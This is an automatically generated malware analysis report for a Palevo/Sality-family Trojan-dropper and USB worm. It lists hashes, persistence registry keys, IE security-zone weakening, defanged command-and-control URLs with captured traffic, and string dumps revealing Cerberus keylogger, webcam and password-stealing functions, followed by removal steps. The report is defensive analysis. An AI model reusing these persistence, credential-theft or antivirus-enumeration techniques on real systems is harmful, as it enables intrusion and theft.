Generic.Palevo.4.B16E9B30_baded12134

by malwarelabrobot on April 17th, 2015 in Malware Descriptions.

Trojan-Dropper.Win32.Agent.zuz (Kaspersky), Generic.Palevo.4.B16E9B30 (B) (Emsisoft), Generic.Palevo.4.B16E9B30 (AdAware), GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Worm, WormAutorun


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: baded12134e3e146644f0b7ba7ef7bbe
SHA1: 74d57a3aa20db240a5f75a7e605a98bbf5931ebd
SHA256: 12f31cdfb88ab5483a0c4b2f0dfa30f0b1a06ffe3e9e0c7c5c7a0849d09e616a
SSDeep: 6144:DlrtwKs6FpaPyP8 YC3GPQhm7gQa9UQty:RyJPyNz2xp
Size: 232448 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-Dropper: a Trojan program intended for the stealthy installation of other malware on the user's system.

Payload

Behaviour Description
WormAutorun: a worm that spreads via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives; the autorun script runs the Generic's file once a user opens the drive's folder in Windows Explorer.


Process activity

The Generic creates the following process(es):

Host Booter bot.exe:1676
bot.exe:576
%original file name%.exe:196

The Generic injects its code into the following process(es):

Xr HoSt BooTer.exe:1704
iexplore.exe:1052

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process Xr HoSt BooTer.exe:1704 makes changes in the file system.
The Generic creates and/or writes to the following file(s):

%System%\vcmgcd32.dll (1568 bytes)
%System%\vcmgcd32.dl_ (17 bytes)
%WinDir%\system.ini (78 bytes)

The Generic deletes the following file(s):

C:\KUKU300a (0 bytes)

The process bot.exe:576 makes changes in the file system.
The Generic creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Microsoft\svchost.exe (601 bytes)

The process %original file name%.exe:196 makes changes in the file system.
The Generic creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Host Booter bot.exe (84 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Xr HoSt BooTer.exe (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bot.exe (125 bytes)

Registry activity

The process Host Booter bot.exe:1676 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 B8 39 97 C8 37 EC 8B 28 8D D7 EF 3D D0 FD 2D"

[HKCU\Software\VeGaS iZ SiK Youtube1]
"FileNameAtual" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Host Booter bot.exe"

The process Xr HoSt BooTer.exe:1704 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EC A0 0D F3 9A E7 F2 5F 99 5B 08 F6 A8 D7 19 38"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Generic modifies IE security-zone settings so that all local web nodes with no dots that are not assigned to any zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Generic modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Generic modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Generic deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process bot.exe:576 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B E8 D6 84 6B DD AD 93 4E 57 65 95 CE D1 F9 57"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data\Microsoft]
"svchost.exe" = "svchost"

The Generic modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To run itself automatically each time Windows boots, the Generic adds the following link to its file under the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"svchost.exe" = "%Documents and Settings%\%current user%\Application Data\Microsoft\svchost.exe"

The Generic modifies IE security-zone settings so that all local web nodes with no dots that are not assigned to any zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Generic modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

The process %original file name%.exe:196 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5E CB 02 A4 CC 9A 82 ED 8B 92 96 81 F5 B4 90 96"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"Xr HoSt BooTer.exe" = "Xr HoSt BooTer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"Host Booter bot.exe" = "Host Booter bot"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"bot.exe" = "bot"

The Generic modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Generic modifies IE security-zone settings so that all local web nodes with no dots that are not assigned to any zone are mapped to the Intranet Zone:

"UNCAsIntranet" = "1"

The Generic modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

Dropped PE files

MD5 File path
49e17a08fde2dc17462f97194220a0d8 c:\Documents and Settings\"%CurrentUserName%"\Application Data\Microsoft\svchost.exe
6ebf6e3875db3dfad9a85ebe2c2f98da c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Host Booter bot.exe
558d0867bf4c786e1a0142188ab52773 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Xr HoSt BooTer.exe
49e17a08fde2dc17462f97194220a0d8 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\bot.exe
5facec93ec966a2577075d44e2ba63c7 c:\WINDOWS\system32\Cerberus\server.exe
ae22ca9f11ade8e362254b452cc07f78 c:\WINDOWS\system32\vcmgcd32.dll
3d0f7adfc75103a1902392c9fd39ed4f c:\%original file name%.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm that spreads via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives; the autorun script runs the Generic's file once a user opens the drive's folder in Windows Explorer.

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 270336 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 274432 221184 217600 5.43823 aa4e34921c6d21139b95027c2595f82d
.rsrc 495616 24576 13824 3.25579 5a3e9955070a8ff7f774b88ddcb0c1a1

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.he3ns1k.info/mrow_pin/?id1398046enwbl8378&rnd=1410734 166.78.144.80
hxxp://www.he3ns1k.info/mrow_pin/?id1398046enwbl8378&rnd=1415500 166.78.144.80
hxxp://www.informat1onupd.info/mrow_pin/?id1398046enwbl8378&rnd=1420140 192.155.89.148
hxxp://www.g1ikdcvns3sdsal.info/mrow_pin/?id1398046enwbl8378&rnd=1415500 166.78.144.80
www.microsoft.com 23.64.223.148


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE Sality Virus User Agent Detected (KUKU)
ET TROJAN Known Sinkhole Response Header

Traffic

GET /mrow_pin/?id1398046enwbl8378&rnd=1415500 HTTP/1.1
User-Agent: KUKU v3.09 exp
Host: VVV.g1ikdcvns3sdsal.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Wed, 15 Apr 2015 22:22:15 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Sinkhole: malware-sinkhole
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html


GET /mrow_pin/?id1398046enwbl8378&rnd=1410734 HTTP/1.1
User-Agent: KUKU v3.09 exp
Host: VVV.he3ns1k.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Wed, 15 Apr 2015 22:22:10 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Sinkhole: malware-sinkhole
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html


The Generic connects to the servers at the following location(s):

Strings from Dumps

Xr HoSt BooTer.exe_1704:

.text
.data
.rsrc
@.rdata
MSVBVM60.DLL
MSComctlLib.StatusBar
MSComctlLib.ProgressBar
Port!
MSComctlLib.ListView
MSWinsockLib.Winsock
PoRT
MSWINSCK.OCX
mscomctl.ocx
%WinDir%\System32\MSWINSCK.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
%Program Files%\SpliT Productions\FPD By SpliT\mscomctl.oca
VBA6.DLL
%System%\vcmgcd32.dll
\vcmgcd32.dl_
Win32.HLLP.Kuku v3.09 stub=->KERNEL32
.reloc
NEL32.dl
*\A%Documents and Settings%\Ash.ASH-46SWIJD8EAP\Desktop\projects\Visual Basic\X-R Host Boot\Project1.vbp
2c49f800-c2dd-11cf-9ad6-0080c7e7b78d
9368265E-85FE-11d1-8BE3-0000F8754DA1
Port
HTTP-
PORTFLOOD-
A*\A%Documents and Settings%\Ash.ASH-46SWIJD8EAP\Desktop\projects\Visual Basic\X-R Host Boot\Project1.vbp
Host Booter 2.exe

Xr HoSt BooTer.exe_1704_rwx_00401000_00001000:


Xr HoSt BooTer.exe_1704_rwx_00430000_00005000:

%System%\vcmgcd32.dll
\vcmgcd32.dl_
Win32.HLLP.Kuku v3.09 stub=->KERNEL32
.reloc
NEL32.dl

iexplore.exe_1052:

.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
SHLWAPI.dll
SHDOCVW.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
IE-X-X
rsabase.dll
System\CurrentControlSet\Control\Windows
dw15 -x -s %u
watson.microsoft.com
IEWatsonURL
%s -h %u
iedw.exe
Iexplore.XPExceptionFilter
jscript.DLL
mshtml.dll
mlang.dll
urlmon.dll
wininet.dll
shdocvw.DLL
browseui.DLL
comctl32.DLL
IEXPLORE.EXE
iexplore.pdb
ADVAPI32.dll
MsgWaitForMultipleObjects
IExplorer.EXE
browseui.dll
shdocvw.dll
6.00.2900.5512 (xpsp.080413-2105)
Windows
Operating System
6.00.2900.5512

iexplore.exe_1052_rwx_00150000_00001000:

KERNEL32.DLL

iexplore.exe_1052_rwx_00290000_00001000:

KERNEL32.DLL

iexplore.exe_1052_rwx_002D0000_00001000:

KERNEL32.DLL

svchost.exe_664:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
oleaut32.dll
EVariantBadIndexError
SQL error or missing database
An internal logic error in SQLite
Operation terminated by sqlite3_interrupt()
Uses OS features not supported on host
2nd parameter to sqlite3_bind out of range
sqlite3_step() has another row ready
sqlite3_step() has finished executing
Unknown SQLite Error Code "
ESQLiteException
TSQLiteDatabaselHA
TSQLiteTable
sqlite3_open
sqlite3_errmsg
sqlite3_free
sqlite3_close
sqlite3_last_insert_rowid
sqlite3_total_changes
sqlite3_errcode
sqlite3_bind_text
sqlite3_bind_int
sqlite3_bind_int64
sqlite3_bind_double
sqlite3_bind_null
sqlite3_bind_blob
sqlite3_prepare_v2
sqlite3_step
sqlite3_reset
sqlite3_finalize
sqlite3_prepare
sqlite3_busy_timeout
sqlite3_libversion
sqlite3_create_collation
sqlite3_bind_parameter_index
sqlite3_changes
sqlite3_column_count
sqlite3_column_name
sqlite3_column_decltype
sqlite3_column_type
sqlite3_column_int64
sqlite3_column_double
sqlite3_column_bytes
sqlite3_column_blob
sqlite3_column_text
Failed to open database "%s" : %s
Failed to open database "%s" : unknown error
Error [%d]: %s.
"%s": %s
Error executing SQL
Could not prepare SQL statement
Error executing SQL statement
SQLite is Busy
udprec
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
:\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
\Mozilla Firefox\
nss3.dll
mozcrt19.dll
sqlite3.dll
nspr4.dll
plc4.dll
plds4.dll
nssutil3.dll
softokn3.dll
PK11_GetInternalKeySlot
userenv.dll
\Mozilla\Firefox\
profiles.ini
\signons3.txt
\Mozilla\Firefox\profiles.ini
signons.sqlite
SELECT * FROM moz_logins
encryptedPassword
Urlmon.dll
Shell32.dll
URLDownloadToFileA
ShellExecuteA
Future Windows version (unknown)
Windows
MSGBOX
UDPStart|
SOFTWARE\Mozilla\Mozilla Firefox\
WEBDL
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
svchost.exe
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegCreateKeyExA
GetCPInfo
wsock32.dll
shell32.dll
SQLite3
KWindows
UrlMon
SQLiteTable3
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Failed to get data for '%s'
Failed to set data for '%s'
%s.Seek not implemented$Operation not allowed on sorted list
Cannot assign a %s to a %s%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value('%s' is not a valid floating point value
I/O error %d
Integer overflow Invalid floating point operation

iexplore.exe_1052_rwx_00310000_00001000:

KERNEL32.DLL

iexplore.exe_1052_rwx_00350000_00001000:

KERNEL32.DLL

iexplore.exe_1052_rwx_00390000_00001000:

KERNEL32.DLL

iexplore.exe_1052_rwx_00C40000_00001000:

advapi32.dll

iexplore.exe_1052_rwx_00D80000_00001000:

advapi32.dll

iexplore.exe_1052_rwx_00DB0000_00001000:

crypt32.dll

iexplore.exe_1052_rwx_00EF0000_00001000:

crypt32.dll

iexplore.exe_1052_rwx_00F20000_00001000:

gdi32.dll

iexplore.exe_1052_rwx_01060000_00001000:

gdi32.dll

iexplore.exe_1052_rwx_01090000_00001000:

ntdll.dll

iexplore.exe_1052_rwx_011D0000_00001000:

ntdll.dll

iexplore.exe_1052_rwx_01200000_00001000:

ole32.dll

iexplore.exe_1052_rwx_01340000_00001000:

ole32.dll

iexplore.exe_1052_rwx_01370000_00001000:

oleaut32.dll

iexplore.exe_1052_rwx_014B0000_00001000:

oleaut32.dll

iexplore.exe_1052_rwx_014E0000_00001000:

pstorec.dll

iexplore.exe_1052_rwx_01620000_00001000:

pstorec.dll

iexplore.exe_1052_rwx_01650000_00001000:

rasapi32.dll

iexplore.exe_1052_rwx_01790000_00001000:

rasapi32.dll

iexplore.exe_1052_rwx_017C0000_00001000:

shell32.dll

iexplore.exe_1052_rwx_01910000_00001000:

shell32.dll

iexplore.exe_1052_rwx_01940000_00001000:

user32.dll

iexplore.exe_1052_rwx_01980000_00001000:

user32.dll

iexplore.exe_1052_rwx_019B0000_00001000:

wsock32.dll

iexplore.exe_1052_rwx_019F0000_00001000:

wsock32.dll

iexplore.exe_1052_rwx_10410000_00036000:

`.rsrc
Portions Copyright (c) 1999,2003 Avenger by NhT
%s -- %s
SHFileOperationA
shell32.dll
URLDownloadToFileA
urlmon.dll
AVICAP32.dll
ntdll.dll
http\shell\open\command
\Internet Explorer\iexplore.exe
kernel32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
ShellExecuteA
SOFTWARE\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
BuildImportTable: can't load library:
BuildImportTable: ReallocMemory failed
BuildImportTable: GetProcAddress failed
BTMemoryLoadLibary: BuildImportTable failed
BTMemoryGetProcAddress: no export table found
BTMemoryGetProcAddress: DLL doesn't export anything
BTMemoryGetProcAddress: exported symbol not found
ReadTCPTable
ReadUdpTable
CloseTcpConnect
dllpass
StartTransferWebcam
StopTransferWebcam
CarregarVariaveisWebCam
WindowsExit
LowLevelKeybdHookProc
CarregarVariaveisWindows
teste.vbs
teste.txt
Set objSecurityCenter = GetObject("winmgmts:\\.\root\SecurityCenter")
Set colFirewall = objSecurityCenter.ExecQuery("Select * From FirewallProduct",,48)
Set colAntiVirus = objSecurityCenter.ExecQuery("Select * From AntiVirusProduct",,48)
Set objFileSystem = CreateObject("Scripting.fileSystemObject")
Set objFile = objFileSystem.CreateTextFile("
Info = Info & "F" & CountFw & ") " & objFirewall.displayName & " v" & objFirewall.versionNumber & Enter
Info = Info & "A" & CountAV & ") " & objAntiVirus.displayName & " v" & objAntiVirus.versionNumber & Enter
objFile.WriteLine(Info)
objFile.Close
cscript.exe
Windows NT 4.0
Windows 2000
Windows XP
Windows Server 2003
Windows Vista
Windows 7
Windows 95
Windows 98
Windows Me
Cerberus_LOG.txt
Cerberus Keylogger
] ---> [
Password
UnitPasswords
advapi32.dll
WindowsLive:name=*
xxxyyyzzz.dat
\Mozilla Firefox\
mozcrt19.dll
sqlite3.dll
nspr4.dll
plc4.dll
plds4.dll
nssutil3.dll
softokn3.dll
nss3.dll
PK11_GetInternalKeySlot
userenv.dll
\Mozilla\Firefox\
profiles.ini
\signons3.txt
\signons2.txt
\signons1.txt
\signons.txt
(unnamed password)
uURLHistory
Password:
Microsoft\Network\Connections\pbk\rasphone.pbk
rasapi32.dll
rnaph.dll
RAS Passwords |
1.1.1.1
0.0.0.0
LogErros_server.txt
windowslistar
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
FirstExecution
getpassword|getmsn|
getpassword|getfirefox|
getpassword|getras|
getpassword|getie|
getpassword|getnoip|
openweb
getpassword
windowsmanager|mensagens|
windowsmanager|windowslistar|
windowsfechar
windowsmax
windowsmin
windowsmostrar
windowsocultar
windowsmintodas
windowscaption
xxyyzz.dat
xyzxyz.dat
keyloggersituacao
keylogger|keyloggersituacao|keyloggerativar|
keylogger|keyloggersituacao|keyloggerdesativar|
keyloggerativar
keyloggerdesativar
keyloggerdeletar
keyloggerenviar
keylogger|mensagens|zero|
keylogger
keyloggerenviar|
remotewebcamenviar
remotewebcamparar
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
listarportasdns
portasativas|mensagens|
portasativas|listarportas|
listarportas
Config.Cerberus
%SYS%
%DESKTOP%
plugin.dat
logs.dat
KWindows
UnitExecuteCommand
IEpasswords
KuURLHistory
UnitKeylogger
WinExec
SetNamedPipeHandleState
GetProcessHeap
CreatePipe
RegOpenKeyExA
RegOpenKeyA
RegDeleteKeyA
RegCreateKeyExA
RegCreateKeyA
RegCloseKey
keybd_event
UnhookWindowsHookEx
SetWindowsHookExA
MapVirtualKeyA
GetKeyboardState
GetKeyState
GetAsyncKeyState
.idata
.reloc
P.rsrc
KERNEL32.DLL
crypt32.dll
gdi32.dll
ole32.dll
oleaut32.dll
pstorec.dll
user32.dll
wsock32.dll


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    Host Booter bot.exe:1676
    bot.exe:576
    %original file name%.exe:196

  2. Delete the original Generic file.
  3. Delete or disinfect the following files created/modified by the Generic:

    %System%\vcmgcd32.dll (1568 bytes)
    %System%\vcmgcd32.dl_ (17 bytes)
    %WinDir%\system.ini (78 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\svchost.exe (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Host Booter bot.exe (84 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Xr HoSt BooTer.exe (212 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\bot.exe (125 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "svchost.exe" = "%Documents and Settings%\%current user%\Application Data\Microsoft\svchost.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
